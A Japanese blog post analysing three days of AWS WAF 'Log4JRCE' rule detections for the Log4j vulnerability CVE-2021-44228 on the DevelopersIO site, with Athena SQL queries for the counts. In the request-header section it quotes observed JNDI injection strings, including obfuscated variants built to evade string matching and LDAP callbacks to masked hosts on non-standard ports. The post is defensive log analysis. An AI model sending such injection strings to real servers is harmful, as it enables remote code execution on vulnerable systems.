Log4j 脆弱性を緩和するAWS WAFの「Log4JRCE」DevelopersIOサイトの3日間の検出結果を紹介します

AWSチームのすずきです。

2021年12月11日、Log4j の脆弱性(CVE-2021-44228)を緩和する AWS WAFのマネージドルール「Log4JRCE」が利用可能になりました。

当ブログ(DevelopersIO) の AWS WAF のログより「Log4JRCE」の検出結果について確認する機会がありましたので、紹介させていただきます。

環境

下記ブログで設定した AWS WAF ACLsを利用しました。

副作用(誤遮断)の回避を優先し、AWS WAFはカウントのみ、IDS相当として3日稼働させました。

結果

Amazon Athenaを利用、SQL(当記事末尾に記載)を利用して集計を試みました。

• Querying AWS WAF Logs

時間別集計

AWS WAFを設定して数時間で「Log4JRCE」による検出が発生していました。

ソースIP別集計

国別集計

AWS WAFによる国判定結果は、DE (ドイツ)、RU (ロシア)、NL (オランダ)が多く記録されていました。

Host

リクエストヘッダの「Host」別集計

IPアドレスは、ELB (国内向)、Global Accelerator(海外向) のIPアドレスで利用中のものでした。

$ host 75.2.71.201 
201.71.2.75.in-addr.arpa domain name pointer a5b041b48e73d3807.awsglobalaccelerator.com.

$ host 52.194.15.214   
214.15.194.52.in-addr.arpa domain name pointer ec2-52-194-15-214.ap-northeast-1.compute.amazonaws.com.

$ host dev.classmethod.jp                                                                                                     
dev.classmethod.jp has address 75.2.71.201
dev.classmethod.jp has address 99.83.185.173
dev.classmethod.jp has IPv6 address 2406:da14:d37:ef12:9cfc:d7bb:1178:be60
dev.classmethod.jp has IPv6 address 2406:da14:d37:ef13:c7a8:b1f3:1bd9:9374
dev.classmethod.jp has IPv6 address 2406:da14:d37:ef11:45b4:dae7:d07:18f9

• AWS が保有するIPアドレスを対象とした脆弱性のスキャンが行われたものと推測されます。
• IPアドレスによるサービス公開を必要としない場合には、AWS WAF、ALBのルールなどを利用してIP直アクセスを遮断する事で、スキャンを回避する効果は期待出来ると思われます。

リクエストヘッダ(Key)

リクエストヘッダのValue値として、「$」「{」「:」を含むヘッダ項目を抽出しました。

多くの報告がある、User-Agent以外のヘッダ項目についても攻撃に使われていました。

リクエストヘッダ(Value)

リクエストヘッダのValue値に「$」「{」「:」を含んでいるものを集計しました。

※IP、ホスト名はマスク済み

単純な文字列一致を回避する指定がありました。

• ${jndi:ldap:
• ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p
• ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}
• ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:
• ${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}

アウトバウンド通信の遮断回避と推測される、LDAP標準の389ポート以外が明示されている記録がありました。

• ${jndi:ldap://#.#.#.#:53
• ${jndi:ldap://#.#.#.#:42063

まとめ

AWS東京リージョンで公開されている 当サイト (DevelopersIO)、 関連システムを含めて Log4j の利用はない環境ですが、Log4j の脆弱性(CVE-2021-44228) を狙ったリクエストが到着している事が確認できました。

AWSのマネージドルール「Log4JRCE」この数日で頻繁な更新が行われている模様です。

• 12/12: Version: 1.2
• 12/14: Version: 1.6

今後もAWSが補足した攻撃パターンについては「Log4JRCE」ルールへの追加が期待できます。 Log4j の脆弱性の軽減を優先する場合、過去バージョンではなく最新(Dafalut)の「Known bad inputs」ルールセットをお試しください。

尚、AWS WAFによる遮断により一定のリスク軽減効果は期待できますが、 今回のLog4jの脆弱性を狙った攻撃パターンが多岐である事から、WAFのみで完全な防御の実現は困難と思われます。

脆弱なLog4jをインターネットアクセス可能な環境で利用しているシステムでは、アップデートなど早急な脆弱性対策を行う事をおすすめします。

• 更新：Apache Log4j の脆弱性対策について(CVE-2021-44228)
• Update for Apache Log4j2 Issue (CVE-2021-44228)
  • Apache Log4j2 Issue (CVE-2021-44228) (Date: 2021/12/10 7:20 PM PDT更新分まで)

参考

今回の AWS WAFログ確認に利用した AthenaのSQLです。

テーブル作成

• LOCATION、storage.location.template のS3パスを変更して利用

CREATE EXTERNAL TABLE `waf_logs`(
    `timestamp` bigint COMMENT 'from deserializer',
    `formatversion` int COMMENT 'from deserializer',
    `webaclid` string COMMENT 'from deserializer',
    `terminatingruleid` string COMMENT 'from deserializer',
    `terminatingruletype` string COMMENT 'from deserializer',
    `action` string COMMENT 'from deserializer',
    `terminatingrulematchdetails` array < struct < conditiontype :string,
    location :string,
    matcheddata :array < string > > > COMMENT 'from deserializer',
    `httpsourcename` string COMMENT 'from deserializer',
    `httpsourceid` string COMMENT 'from deserializer',
    `rulegrouplist` array < struct < rulegroupid :string,
    terminatingrule :struct < ruleid :string,
    action :string,
    rulematchdetails :string >,
    nonterminatingmatchingrules :array < struct < ruleid :string,
    action :string,
    rulematchdetails :array < struct < conditiontype :string,
    location :string,
    matcheddata :array < string > > > > >,
    excludedrules :array < struct < ruleid :string,
    exclusiontype :string > > > > COMMENT 'from deserializer',
    `ratebasedrulelist` array < struct < ratebasedruleid :string,
    limitkey :string,
    maxrateallowed :int > > COMMENT 'from deserializer',
    `nonterminatingmatchingrules` array < struct < ruleid :string,
    action :string > > COMMENT 'from deserializer',
    `requestheadersinserted` string COMMENT 'from deserializer',
    `responsecodesent` string COMMENT 'from deserializer',
    `httprequest` struct < clientip :string,
    country :string,
    headers :array < struct < name :string,
    value :string > >,
    uri :string,
    args :string,
    httpversion :string,
    httpmethod :string,
    requestid :string > COMMENT 'from deserializer',
    `labels` array < struct < name :string > > COMMENT 'from deserializer'
) PARTITIONED BY
    (
        `day` string
    ) ROW FORMAT SERDE 'org.openx.data.jsonserde.JsonSerDe' 
    STORED AS INPUTFORMAT 'org.apache.hadoop.mapred.TextInputFormat' 
    OUTPUTFORMAT 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat' 
    LOCATION 's3://<S3BUCKET_NAME>/AWSLogs/<ACCOUNT_ID>/WAFLogs/<REGION>/###-webacl' TBLPROPERTIES(
        'projection.day.format' = 'yyyy/MM/dd',
        'projection.day.interval' = '1',
        'projection.day.interval.unit' = 'DAYS',
        'projection.day.range' = '2021/01/01,NOW',
        'projection.day.type' = 'date',
        'projection.enabled' = 'true',
        'storage.location.template' = 's3://<S3BUCKET_NAME>/AWSLogs/<ACCOUNT_ID>/WAFLogs/<REGION>/###-webacl/${day}'
    )

集計

日時別

SELECT
  COUNT(1) AS "検出数",
  date_format(from_unixtime(timestamp / 1000), '%Y/%m/%dT%H') AS "UTC日時"
FROM
  waf_logs
WHERE
  day BETWEEN '2021/12/12' AND '2021/12/14'
AND labels[1].name LIKE '%Log4JRCE%'
GROUP BY
  date_format(from_unixtime(timestamp / 1000), '%Y/%m/%dT%H')
ORDER BY
  date_format(from_unixtime(timestamp / 1000), '%Y/%m/%dT%H')

ソースIP別

SELECT
  COUNT(1) AS "検出数",
  concat(regexp_extract("httprequest"."clientip", '([0-9]+\.[0-9]+\.[0-9]+\.)', 1), 'x') AS "接続元IP"
FROM
  "default"."waf_logs"
WHERE
  day BETWEEN '2021/12/12' AND '2021/12/14'
AND labels[1].name LIKE '%Log4JRCE%'
GROUP BY
  concat(regexp_extract("httprequest"."clientip", '([0-9]+\.[0-9]+\.[0-9]+\.)', 1), 'x')
ORDER BY
  COUNT(1)  DESC

国別

SELECT
  COUNT(1) AS "検出数",
  "httprequest"."country" as "国"
FROM
  "default"."waf_logs"
WHERE
  day BETWEEN '2021/12/12' AND '2021/12/14'
AND labels[1].name LIKE '%Log4JRCE%'
GROUP BY
  "httprequest"."country"
ORDER BY
  COUNT(1) DESC

Hostヘッダ別

SELECT
  COUNT(1) AS "検出数",
  header.VALUE
FROM
  waf_logs
  CROSS JOIN
    UNNEST(httprequest.headers) AS t(header)
WHERE
  day BETWEEN '2021/12/12' AND '2021/12/14'
AND labels[1].name LIKE '%Log4JRCE%'
AND LOWER(header.name) = 'host'
GROUP BY
  header.VALUE
ORDER BY
  COUNT(1) DESC

リクエストヘッダ(Key)

SELECT
  COUNT(1) AS "検出数",
  header.name
FROM
  waf_logs
  CROSS JOIN
    UNNEST(httprequest.headers) AS t(header)
WHERE
  day BETWEEN '2021/12/12' AND '2021/12/14'
AND labels[1].name LIKE '%Log4JRCE%'
and header.VALUE like '%$%'
and header.VALUE like '%{%'
and header.VALUE like '%:%'
GROUP BY
  header.name
ORDER BY
  COUNT(1) DESC

リクエストヘッダ(Value)

SELECT
  COUNT(1) AS "検出数",
  SUBSTRING(header.VALUE, 1, 80)
FROM
  waf_logs
  CROSS JOIN
    UNNEST(httprequest.headers) AS t(header)
WHERE
  day BETWEEN '2021/12/12' AND '2021/12/14'
AND labels[1].name LIKE '%Log4JRCE%'
AND header.VALUE LIKE '%$%'
AND header.VALUE LIKE '%{%'
AND header.VALUE LIKE '%:%'
GROUP BY
  SUBSTRING(header.VALUE, 1, 80)
ORDER BY
  COUNT(1) DESC